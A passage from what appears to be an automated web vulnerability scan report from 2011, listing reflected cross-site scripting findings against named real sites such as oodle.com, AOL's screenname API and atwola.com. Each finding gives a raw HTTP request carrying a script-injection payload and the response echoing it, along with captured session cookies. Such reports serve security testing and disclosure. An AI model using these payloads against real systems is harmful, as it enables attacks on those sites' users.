Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 00:55:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 00:59:00 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4851

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
<div id="fs" class="ad-180x150aa9e5"><script>alert(1)</script>0234b75261d">
...[SNIP]...

5.33. http://apartments.rentedspaces.oodle.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://apartments.rentedspaces.oodle.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b68bb"><script>alert(1)</script>17755f1e103 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b68bb"><script>alert(1)</script>17755f1e103=1 HTTP/1.1
Host: apartments.rentedspaces.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
X-ODL-Server: Ym9uZXM=
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Thu, 05 May 2011 10:52:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: otu=2185e70315ab611df10e714ffdfebac5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=b8aabdc0f23d046c06b479adb5ae1264; path=/; domain=.oodle.com
Set-Cookie: a=dT1EMjEwMzc1MjREQzI4MTgy; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: multivariate=YToyOntzOjEyOiJyZW50ZWRzcGFjZXMiO3M6MTI6InJlbnRlZHNwYWNlcyI7czoxMDoiX3RpbWVzdGFtcCI7aToxMzA0NTkyNzcwO30%3D; path=/; domain=.oodle.com
Set-Cookie: loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7TjtzOjc6ImNvdW50cnkiO3M6MzoiVVNBIjtzOjk6InJlZ2lvbl9pZCI7czozOiIzMDQiO3M6OToiY2l0eV9jb2RlIjtOO3M6Njoib3JpZ2luIjtzOjU6ImNhY2hlIjt9fQ%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Content-Length: 216655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://apartments.oodle.com/?b68bb"><script>alert(1)</script>17755f1e103=1" />
...[SNIP]...

5.34. http://apartments.rentedspaces.oodle.com/ [post_redirect parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://apartments.rentedspaces.oodle.com
Path:	/

Issue detail

The value of the post_redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93d1e"><script>alert(1)</script>0a65c36f3ad was submitted in the post_redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?post_redirect=193d1e"><script>alert(1)</script>0a65c36f3ad HTTP/1.1
Host: apartments.rentedspaces.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
X-ODL-Server: c3VsdQ==
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Thu, 05 May 2011 13:03:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: otu=228eb9f281eb0d14a0310b873592e387; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=0831ab39f0c8bd5528ecac12eea81fe6; path=/; domain=.oodle.com
Set-Cookie: a=dT1ENzc5QTI2RjREQzJBMDE2; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: multivariate=YToyOntzOjEyOiJyZW50ZWRzcGFjZXMiO3M6MTI6InJlbnRlZHNwYWNlcyI7czoxMDoiX3RpbWVzdGFtcCI7aToxMzA0NjAwNTk4O30%3D; path=/; domain=.oodle.com
Set-Cookie: loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7TjtzOjc6ImNvdW50cnkiO3M6MzoiVVNBIjtzOjk6InJlZ2lvbl9pZCI7czozOiIzMDQiO3M6OToiY2l0eV9jb2RlIjtOO3M6Njoib3JpZ2luIjtzOjU6ImNhY2hlIjt9fQ%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Content-Length: 222672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://apartments.oodle.com/?post_redirect=193d1e"><script>alert(1)</script>0a65c36f3ad" />
...[SNIP]...

5.35. http://api.screenname.aol.com/auth/getToken [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.screenname.aol.com
Path:	/auth/getToken

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 54dab<script>alert(1)</script>4f3d94004bb was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /auth/getToken?devId=ao17McU4gORZ7DqV&attributes=displayName,loginId,profileUrl,pictureUrl,providerStr,providerDisplayName&f=json&c=jsonp130457501134354dab<script>alert(1)</script>4f3d94004bb HTTP/1.1
Host: api.screenname.aol.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575010062-Repeat%7C1367647010062%3B%20s_nrgvo%3DRepeat%7C1367647010064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:59 GMT
Set-Cookie: JSESSIONID=786625853431F338BA8AD4E06AC98398; Path=/auth
Set-Cookie: OASC=diAxLjAgayAwIFpoakMzOGxtK2l2TTREVGhxaVlnSE8vdVhtTT0%3D-SSQdmqasJXW7AratTMW0EY3204%2BolSyJ67U1vJszd1noF40Fu%2FJMgOz%2FgzlQ4T4HfJQB7UBTF4I%3D; Path=/; HTTPOnly
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 130

jsonp130457501134354dab<script>alert(1)</script>4f3d94004bb({"response": {"statusCode": 400, "statusText": "Invalid callback"}});

5.36. https://api.screenname.aol.com/auth/getToken [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://api.screenname.aol.com
Path:	/auth/getToken

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 2c3af<script>alert(1)</script>07af1547688 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /auth/getToken?devId=ru1m1hWVLRPqEkwX&f=json&c=doGetToken.gotToken2c3af<script>alert(1)</script>07af1547688 HTTP/1.1
Host: api.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; JSESSIONID=BBF9B7FB9E26D8ED033DC7F99C6FF372; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; OASC=diAxLjAgayAwIEtka21Cc09VUUtRRGRQRCtGZ1lUMG9KeWU5OD0%3D-SSQdmqasJXW7AratTMW0EQEWTMe1VUR5nhDclcT%2FxS5anlWsRZrQQVYOAITNhFUURd6bocJQ7JlhxqVytjSx4wPs6vBqi04y; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 13:01:47 GMT
Set-Cookie: JSESSIONID=1B31EE08F46C7362825E10413449A1AA; Path=/auth; Secure
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Connection: close

doGetToken.gotToken2c3af<script>alert(1)</script>07af1547688({"response": {"statusCode": 400, "statusText": "Invalid callback"}});

5.37. http://apps.conduit-banners.com/TechCrunchApp-Techcrunch_APP [imageurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://apps.conduit-banners.com
Path:	/TechCrunchApp-Techcrunch_APP

Issue detail

The value of the imageurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1dd1'%3balert(1)//12dd62a0907 was submitted in the imageurl parameter. This input was echoed as f1dd1';alert(1)//12dd62a0907 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TechCrunchApp-Techcrunch_APP?appid=0b9c9103-d379-409d-9edb-54745461fe64&script=togo&type=1&imageurl=http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/conduit.giff1dd1'%3balert(1)//12dd62a0907&supportedonly=1 HTTP/1.1
Host: apps.conduit-banners.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 05 May 2011 00:59:49 GMT
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 4680

function imgToGoOnLoad__1312324258(imgObj) {var elm = imgObj,func__1312324258 = function(){
SharedItems.Togo.Manager.createItem('0b9c9103-d379-409d-9edb-54745461fe64','','2523688','TechCrunch-Ap
...[SNIP]...
<img style="cursor: pointer; visibility: visible;" src="http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/conduit.giff1dd1';alert(1)//12dd62a0907" title="Grab an app for your browser" alt="Techcrunch News" border="0" onload="imgToGoOnLoad__1312324258(this);" >
...[SNIP]...

5.38. http://apps.conduit.com/TechCrunch_App-Techcrunch_News [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://apps.conduit.com
Path:	/TechCrunch_App-Techcrunch_News

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4163b'a%3d'b'ed58c988a40 was submitted in the REST URL parameter 1. This input was echoed as 4163b'a='b'ed58c988a40 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /TechCrunch_App-Techcrunch_News4163b'a%3d'b'ed58c988a40?appid=0b9c9103-d379-409d-9edb-54745461fe64&source=8&displaytype=togo HTTP/1.1
Host: apps.conduit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:02:03 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Length: 15083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type='text/javascript' src='http://apps.conduit.com/TechCrunch_App-Techcrunch_News4163b'a='b'ed58c988a40?appid=0b9c9103-d379-409d-9edb-54745461fe64&source=8&displaytype=togo&script=1&loggeronly=1&itemsource=1'>
...[SNIP]...

5.39. http://ar.voicefive.com/b/rc.pli [func parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload f7d49<script>alert(1)</script>573fa588bae was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractionf7d49<script>alert(1)</script>573fa588bae&n=ar_int_p97174789&1304575029874 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:57:18 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractionf7d49<script>alert(1)</script>573fa588bae("");

5.40. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://at.atwola.com
Path:	/adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e9d8"><script>alert(1)</script>2b33d8fc33c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe1e9d8"><script>alert(1)</script>2b33d8fc33c/3.0/5113.1/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn1e9d8"><script>alert(1)</script>2b33d8fc33c/3.0/5113.1/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

5.41. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://at.atwola.com
Path:	/adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc88c"><script>alert(1)</script>11931b329c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0fc88c"><script>alert(1)</script>11931b329c4/5113.1/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0fc88c"><script>alert(1)</script>11931b329c4/5113.1/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

5.42. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://at.atwola.com
Path:	/adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68953"><script>alert(1)</script>6729eb7dd53 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.168953"><script>alert(1)</script>6729eb7dd53/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.168953"><script>alert(1)</script>6729eb7dd53/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

5.43. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://at.atwola.com
Path:	/adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc56b"><script>alert(1)</script>f3885e3ce75 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794cc56b"><script>alert(1)</script>f3885e3ce75/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794cc56b"><script>alert(1)</script>f3885e3ce75/0/-1/size=300x250;adiframe=y">
...[SNIP]...

5.44. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://at.atwola.com
Path:	/adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4aa31"><script>alert(1)</script>17fbae92a91 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/04aa31"><script>alert(1)</script>17fbae92a91/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/04aa31"><script>alert(1)</script>17fbae92a91/-1/size=300x250;adiframe=y">
...[SNIP]...

5.45. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://at.atwola.com
Path:	/adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9c97"><script>alert(1)</script>d52ab365ef1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1c9c97"><script>alert(1)</script>d52ab365ef1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1c9c97"><script>alert(1)</script>d52ab365ef1/size=300x250;adiframe=y">
...[SNIP]...

5.46. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://at.atwola.com
Path:	/adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b4de"><script>alert(1)</script>118786fa1f1 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size7b4de"><script>alert(1)</script>118786fa1f1=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
